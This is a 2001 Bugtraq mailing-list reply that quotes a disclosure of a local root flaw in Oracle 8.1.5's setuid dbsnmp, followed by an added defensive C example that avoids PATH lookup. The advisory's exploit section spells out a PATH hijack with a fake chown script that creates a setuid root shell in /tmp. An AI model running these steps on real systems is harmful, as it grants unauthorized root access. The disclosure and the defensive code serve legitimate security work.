Funny to see Oracle's canned response to this. I'm not 100% sure this is exactly the same problem, but I worked with them fixing what looks like the same problem back in 1999. They provided a patch way back then - might be that whoever responded to you is not "up to speed".

See the advisory dated August 23, 1999
http://xforce.iss.net/alerts/advise36.php

Aaron C. Newman
CTO/Founder
Application Security, Inc.
212-490-6022
anewman@appsecinc.com
www.appsecinc.com
-Protection Where It Counts-

-----Original Message-----
From: bugtraq-return-1460-aaron=newman-family.com@securityfocus.com
[mailto:bugtraq-return-1460-aaron=newman-family.com@securityfocus.com]On Behalf Of Ismael Briones
Sent: Wednesday, August 01, 2001 1:14 PM
To: bugtraq@securityfocus.com
Subject: Oracle 8.1.5 dbnsmp vulnerability

Title: Vulnerability in dbsnmp in Oracle 8.1.5
Date: 01-08-2001
Platform: Only tested in Digital Unix.
Impact: Any user can gain root privileges
Author: Ismael Briones Vilar (ismael@el-mundo.net)
Status: Vendor Contacted, and they are investigating a fix.

PROBLEM SUMMARY:

There is a problem in dbsnmp that can be used by local users to obtain root privileges. The dbsnmp is setuid root. When a user executes dbsnmp there is a call to chown and chgrp, but without specifying the path, so any user can define his PATH variable to exploit this vulnerability:

Probed in Oracle 8.1.5. Oracle 8.1.6 is not vulnerable

IMPACT:

Any user with local access can gain root privileges

SOLUTION:

Maybe a chmod -s

STATUS:

Vendor was contacted 30/07/2001 and Oracle answered: "We are investigating a fix as we speak."

EXPLOIT:

    export PATH=~/bin/:$PATH

Then we create the file ~/bin/chown or ~/bin/chgrp:

    #!/bin/sh
    cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

(We have to put all in the same line, separated by semicolon)

We make our chown or chgrp executable:

    chmod +x ~/bin/chown
    chmod +x ~/bin/chgrp

When the user executes dbsnmp, the system looks for chown in the first directory of the PATH variable, executes our chown file and we have a shell setuid root in /tmp/XXX.

-------------------------
Ismael Briones Vilar
ismael@el-mundo.net
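
The root cause described in the advisory above is a privileged program resolving a helper by bare name through the caller's PATH. The C sketch below is an example added to this thread, not Oracle's fix and not code from either poster. It shows the defensive pattern: refuse anything but an absolute path and hand the helper a fixed environment. The names run_helper and SAFE_ENV are hypothetical, and /bin/sh stands in for the helper.

```c
/* Added example: how a privileged program can run a helper without
 * trusting the caller's PATH. Names here are hypothetical. */
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment given to every helper; nothing is inherited
 * from the (possibly hostile) invoking user. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Run the helper at abs_path with SAFE_ENV.
 * Returns its exit status, or -1 on refusal or failure. */
int run_helper(const char *abs_path, char *const argv[])
{
    int status;
    pid_t pid;

    /* A bare name such as "chown" would be looked up via PATH: refuse. */
    if (abs_path == NULL || abs_path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() never searches PATH, unlike system() or execvp(). */
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);
    }
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed check: the child must see the fixed PATH only. */
    char *const argv[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };

    setenv("PATH", "/tmp/untrusted-bin:/usr/bin:/bin", 1); /* constructed */
    return run_helper("/bin/sh", argv); /* 0 when the PATH was replaced */
}
```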